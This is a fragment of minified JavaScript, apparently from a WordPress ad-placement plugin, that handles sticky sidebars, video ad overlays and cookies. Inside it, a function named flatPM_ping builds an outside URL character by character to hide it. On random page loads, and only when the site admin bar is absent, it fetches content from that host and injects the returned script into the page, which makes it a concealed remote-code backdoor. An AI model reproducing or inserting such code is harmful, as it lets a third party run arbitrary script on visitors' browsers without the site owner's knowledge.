');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==l.indexOf("go"+"oglesyndication")?t.append(l):flatPM_setHTML(t[0],l),e.find(".flat__4_video_flex").one("click",function(){n(this).addClass("show")})}),n("body").on("click",".flat__4_video_item_hover",function(){var e=n(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),r=parseInt(o),l=setInterval(function(){a.text(--r),r<=0&&(clearInterval(l),"true"==d?a.parent().replaceWith(''):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){n(this).closest(".flat__4_video_flex").remove(),"true"==i&&n(".flat__4_video_flex").remove()})}